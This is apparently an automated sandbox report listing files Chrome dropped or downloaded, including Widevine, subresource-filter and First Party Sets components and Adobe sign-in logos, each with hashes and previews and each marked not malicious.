                                                                                                      MD5:477C17B6448695110B4D227664AA3C48
                                                                                                      SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
                                                                                                      SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
                                                                                                      SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V*......V*......`,......`+..p....+. )...p,......D*.8....................C*.(.....(.8...........p\*..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l....*..&....*.............@....pdata...p...`+..r....*.............@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1778
                                                                                                      Entropy (8bit):6.02086725086136
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:p/hCdQAdJjRkakCi0LXjX9mqjW6JmfQkNWQzXXf2gTs:RtQ1aaxXrjW6JuQEWQKas
                                                                                                      MD5:3E839BA4DA1FFCE29A543C5756A19BDF
                                                                                                      SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
                                                                                                      SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
                                                                                                      SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
                                                                                                      Malicious:false
                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):66
                                                                                                      Entropy (8bit):3.974403644129192
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:SLVV8T+WSq2ykFDJp9qBn:SLVqZS5p0B
                                                                                                      MD5:D30A5BBC00F7334EEDE0795D147B2E80
                                                                                                      SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
                                                                                                      SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
                                                                                                      SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
                                                                                                      Malicious:false
                                                                                                      Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):145
                                                                                                      Entropy (8bit):4.595307058143632
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rR6TAulhFphifFooG+HhFFKS18CWjhXLXGPQ3TRpvF/FHddTcplFHddTcVYA:F6VlM5PpKS18hRIA
                                                                                                      MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
                                                                                                      SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
                                                                                                      SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
                                                                                                      SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
                                                                                                      Malicious:false
                                                                                                      Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74598
                                                                                                      Entropy (8bit):5.5368864380577545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:7geXUzNNSGg1dSkNp+z55w4kgNmmO6I7kWvQFlGlHUvkS6xt/GL95vkdwz:sDRNfgr9NpK5wl+1O6IoWQFlGlHLS6xQ
                                                                                                      MD5:C6AF15DA82A8A9172FC9CAFC969DE4F9
                                                                                                      SHA1:81F477E181036D551EF6F09CB875C6B280BEBE00
                                                                                                      SHA-256:782009D9765C6104A1B4D1EAC553834E7E399D749A082EAD42BB47ABB42895B5
                                                                                                      SHA-512:F541CB1703A0BD31FCB6E293ACBC6E20F73B365FF8D2270A6D44780E9D5731B8D7803AECACD49D73E0DA065DD1026C9FA95F9CAD2BF0776CE1E2C3C9FCA052C6
                                                                                                      Malicious:false
                                                                                                      Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.just-news.pro^..........0.8.@.R.yomeno.xyz^..........0.8.@.R.yellowblue.io^..........0.8.@.R.thubanoa.com^..........0.8.@.R.abh.jp^..........0.8.@.R.ad999.biz^..........0.8.@.R._468_60...........0.8.@.R.adrecover.com^..........0.8.@.R.pemsrv.com^..........0.8.@.R.mnaspm.com^..........0.8.@.R..ar/ads/.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_.>........*...worldstar.com0.8.@.R.js.assemblyexchange.com/wana..(........0.8.@.R.ogads-pa.googleapis.com^..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^.(........0.8.@.R.shikoku-np.co.jp/img/ad/..........0.8.@.R./banner.cgi?..........0.8.@.R./in/track?data=.!......0.8.@.R.linkbucks.com/tmpl/..........0.8.@.R.clicktripz.com^..........0.8.@.R.-ad-manager/........0.8.@.R.files.slack.com^.$........0.8.@.R.admitad-connect.com^..........0.8.@.R./300-250-.2........0.8.@.R"cloud
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24623
                                                                                                      Entropy (8bit):4.588307081140814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                      MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                      SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                      SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                      SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                      Malicious:false
                                                                                                      Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1529
                                                                                                      Entropy (8bit):5.97509175092227
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pZRj/flTHY4NukYbKcFjeT3U8zkaoX+UqiF46u9ILn9oXUMzniumZ39TzIS/Xre:p/h44SbKcETEwkakBa6F9kUpumZR/Xi
                                                                                                      MD5:951BA6192A41622EC0E04174E1EFA31C
                                                                                                      SHA1:2C63243A5589671BF649FA049542308D3D7EB40E
                                                                                                      SHA-256:EA426C8FDAFABF1B3162C206175A17100613C85A0C30DDCDC0A3434232B69D59
                                                                                                      SHA-512:F9C612AA2848C01C2A3294378E6707AE92638FC5EF4C6C911D400AA981418AEF0334DBFAB1D954E0666ECDD5AB8B1506354D9C6DCF6D3D1459FAC2AD06F9E23E
                                                                                                      Malicious:false
                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJ1VkRrWHp2UWlFeHdiRGtPWHNQdWtuXzI3ZGdIbGhPdDRQeENEZ0JnUXhRIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IlhiOTU4SjJabnFtQzJRMzBYclJFNl9acURIQU9VZFRKaFdyNzV6SnVuV2sifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuNTIuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"534ZoaSA4vZpcy0b1OYq4wgLlduJCzBpUCZnNXyx3UoH1ihy6uYapK85BVjJa1ptpN9OiT86GN1r8DNZlX69tLTIyTb7lSKoX31Sef3uvZpSLJBlIGI1173pGoj52Eu77I4DraCiKTVQ4mtVLBee579FqGijozIApfrepXVZeIes4wac06yB06DuFkdEg_jnCv3xR2twcNzidsDVTw7W-VOezjdZgjousBDON_Pumwd7_4ze5
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):66
                                                                                                      Entropy (8bit):3.8945408555413215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:SjWMQ0GiUVfkCzNMEkDRApvTD:SjWR/3tkNApvTD
                                                                                                      MD5:87190EF44A670A5418E7E6B26DA5CF02
                                                                                                      SHA1:7F24A0F6E188CA285526C968359D5DEEB0CA3F1C
                                                                                                      SHA-256:B9C7B754CFFECA3981CA26BCFEC1FA9988070C8657AE9DA3CA2EA7944E16AB00
                                                                                                      SHA-512:2980EBB51CCEE91B7F887A49D495BA9E3F4D0274AA6D4D0A3E8E4D3E3661815FB825C6D44DAFA34285E3625F979084FFAD5D54E8AE0B9E12ABFEF5C2F71E568C
                                                                                                      Malicious:false
                                                                                                      Preview:1.b48b30af5ce18c96128bfff9d2755c7932a1f32adc66f68322f7dd505db9626f
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):114
                                                                                                      Entropy (8bit):4.547350270682037
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1HVgn:F6VlMZWuMt5SKPS16n
                                                                                                      MD5:3EE731D0E5BFB74CACB3D9E2DFDC7768
                                                                                                      SHA1:EE15CB60213BB402FD90308F0F67D7B6160C9751
                                                                                                      SHA-256:5DBF79F09D999EA982D90DF45EB444EBF66A0C700E51D4C9856AFBE7326E9D69
                                                                                                      SHA-512:F38E3FEDD392F9B273565CBE321A56051EDAF48DB75A0EBB539D57E8D1238D4BAC41E973F037395F9C5D4A189DF5E68726ED2C000134FC36BB7E7295C9A779C1
                                                                                                      Malicious:false
                                                                                                      Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.52.0".}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1558
                                                                                                      Entropy (8bit):5.11458514637545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                      MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                      SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                      SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                      SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                      Malicious:false
                                                                                                      Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1864
                                                                                                      Entropy (8bit):6.018989605004616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                                      MD5:C4709C1D483C9233A3A66A7E157624EA
                                                                                                      SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
                                                                                                      SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
                                                                                                      SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
                                                                                                      Malicious:false
                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):66
                                                                                                      Entropy (8bit):3.820000180714897
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
                                                                                                      MD5:BBEC7670A2519FEB0627F17D0C0B5276
                                                                                                      SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
                                                                                                      SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
                                                                                                      SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
                                                                                                      Malicious:false
                                                                                                      Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):85
                                                                                                      Entropy (8bit):4.462192586591686
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
                                                                                                      MD5:084E339C0C9FE898102815EAC9A7CDEA
                                                                                                      SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
                                                                                                      SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
                                                                                                      SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
                                                                                                      Malicious:false
                                                                                                      Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9817
                                                                                                      Entropy (8bit):4.629347296880043
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
                                                                                                      MD5:8C702C686B703020BC0290BAFC90D7A0
                                                                                                      SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
                                                                                                      SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
                                                                                                      SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
                                                                                                      Malicious:false
                                                                                                      Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1395
                                                                                                      Entropy (8bit):5.208290651600866
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tsWIKcRjJhKjY5AV8LVM3xjMAQilUK4clMMAk2iIlXQLxGMA9boilT7OQw/acW/E:fITjVKVUYpQvK47PBOm9cs3wSTW8m
                                                                                                      MD5:02AC94A5A07350ADB0D698C5064D4E1B
                                                                                                      SHA1:CD1777F9A9FC8C7D764C6538F8A0610B6E9F2829
                                                                                                      SHA-256:52CFE86EC6730241C530C5617099657F9B7561994CD257E50ACA4E60737851FD
                                                                                                      SHA-512:90D090E2A4DC7951DBA3526E625DB0C96DA913E18E91867A51D1CAB21CC63F4B93DC3CBF1ECE258549EAB10C8E1E6F66A37427C49E51537CE64CCA907AE5EABE
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/sml-google-logo.svg
                                                                                                      Preview:<svg id="Button_-_Google" data-name="Button - Google" xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25" fill="#fff"/>. <g id="Group_69890" data-name="Group 69890" transform="translate(13 10.771)">. <g id="logo_googleg_48dp" transform="translate(0 2.228)">. <path id="Shape" d="M20.52,9.818A13.788,13.788,0,0,0,20.3,7.364H9v4.642h6.458a5.52,5.52,0,0,1-2.395,3.622v3.011h3.878a11.7,11.7,0,0,0,3.578-8.82Z" transform="translate(3 2.455)" fill="#4285f4" fill-rule="evenodd"/>. <path id="Shape-2" data-name="Shape" d="M11.681,20.43a11.456,11.456,0,0,0,7.942-2.907l-3.878-3.011a7.24,7.24,0,0,1-10.778-3.8H.957v3.109A12,12,0,0,0,11.681,20.43Z" transform="translate(0.319 3.57)" fill="#34a853" fill-rule="evenodd"/>. <path id="Shape-3" data-name="Shape" d="M5.285,12.627a7.094,7.094,0,0,1,0-4.56V4.958H1.276a12.015,12.015,0,0,0,0,10.778l4.009-3.109Z" transform="translate(0 1.653)" fill="#fbbc05" fill-rul
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):4.660933852975397
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4NlfPGECSOn7QVP8B/HaqhAX7dU2SHalK3eRVnzKmQweoxGIJeJMcfNr77JBTyn:t4NlfPGjn7h1HaqAX7dtRK+Jz9eoxdJL
                                                                                                      MD5:4C5A5A172465BEFD580445C07F70F2F0
                                                                                                      SHA1:8FAF7BDA342FC570795E46B6DD908AFE3BB49B8F
                                                                                                      SHA-256:14C7E9928FABB3ACF7BC07024069E2ACDAED31BC66EBDCB1FCA8E38D27B8037F
                                                                                                      SHA-512:F6B05E5116FABA49803BCE3F5731CDA12C8E9CD60A984F8515800B1276ED3025671E9A40F1254380140C6C9F97CAA5BE4B79DDBB5180294DED3761357ED64306
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/apple.svg
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 26.034 32"><g transform="translate(0 0)"><path d="M31.354,22.608a7.272,7.272,0,0,1,3.463-6.1,7.444,7.444,0,0,0-5.865-3.171c-2.468-.259-4.86,1.477-6.117,1.477-1.282,0-3.218-1.451-5.3-1.408a7.811,7.811,0,0,0-6.573,4.009c-2.842,4.921-.722,12.152,2,16.129,1.362,1.948,2.954,4.123,5.037,4.046,2.038-.085,2.8-1.3,5.26-1.3,2.438,0,3.152,1.3,5.277,1.251,2.187-.035,3.565-1.956,4.88-3.922a16.109,16.109,0,0,0,2.231-4.544,7.027,7.027,0,0,1-4.29-6.465Z" transform="translate(-9.609 -5.59)"/><path d="M23.551,12.976a7.16,7.16,0,0,0,1.638-5.13,7.285,7.285,0,0,0-4.714,2.439,6.813,6.813,0,0,0-1.681,4.94A6.024,6.024,0,0,0,23.551,12.976Z" transform="translate(-5.82 -7.847)"/></g></svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2385
                                                                                                      Entropy (8bit):4.552627667062907
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:H/x7RIelK6eG0UPR/6OJz7fOn6WtTZeIdzKLj6RtAFmALWmc5nvq6GwhJwjwAg:J7R5EDLUPR/Zz7Gn59xe6tfu+qPaym
                                                                                                      MD5:E36799E0084267AA804E9B470DE17094
                                                                                                      SHA1:C15770F1FAADE2A58003BA8D3E34940621987DE2
                                                                                                      SHA-256:6BD8880193131672D32517ED1EA30CF871F317B9A62F523F67B8A3B34CAF1722
                                                                                                      SHA-512:C3DF0BD86D66A78DC46161D0E5B10802D6E9C34102E8743EA600F995D1018F30B314275D6BE9195937AA24F62FB452D2FA5C61916E72A81CD902808464BC72EB
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" width='70' height='18' viewBox="0 0 453.75 118.11" focusable='false'>. <path. d="M202,85.26l-4.89,15.08a1.1,1.1,0,0,1-1.12.82H184.12c-.71,0-.92-.41-.81-1L203.7,41.31a18.89,18.89,0,0,0,1-6.22.68.68,0,0,1,.61-.71h16.31c.51,0,.71.1.82.61l23.14,65.25c.2.51.1.92-.51.92H231.84a1,1,0,0,1-1.13-.71l-5.2-15.19Zm19.78-12.75c-2-6.73-6.12-19.06-8.05-26.3h-.1c-1.64,6.83-5.31,18-8,26.3Z". transform="translate(-6.07 -6.51)"/>. <path. d="M247.21,76.28c0-14.58,10.91-26.81,29.57-26.81.81,0,1.83.1,3.36.2V29.59a.64.64,0,0,1,.71-.71H293.7c.51,0,.61.2.61.61V89.74a56.68,56.68,0,0,0,.41,7.44c0,.51-.1.72-.71.92a51.21,51.21,0,0,1-20.09,4.08C258.83,102.18,247.21,93.62,247.21,76.28Zm32.93-14.47a10.53,10.53,0,0,0-3.77-.51c-7.85,0-14.58,4.79-14.58,14.27,0,10.09,5.81,14.48,13.56,14.48a14.38,14.38,0,0,0,4.79-.61Z". transform="translate(-6.07 -6.51)"/>. <path. d="M352.7,75.57c0,16-10.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):392
                                                                                                      Entropy (8bit):5.080341403416466
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4NlfPGnR5e9EaV60EzDX0w2HbrmiFgxyaTbh:t4NlfPGnRw9EHWHbvgUafh
                                                                                                      MD5:AAEB95990783A7B42BEC3670F58E3FE0
                                                                                                      SHA1:6ACCE01366AA766DA036A30D1F806C0DE7B83672
                                                                                                      SHA-256:60A63C156DBCFE2188678E58F0357C23CB325E45B1B854C9DB9A1D47E091A38E
                                                                                                      SHA-512:E66DE7CE6DF64A9F2C3166B7C1176949DA1292316FFCC8119F1F3573F2A6A6C4D6F7E8993F00D2E31D94B0989663CE74C8EE5C0CA58FC2DE2C5B9C38B8B04780
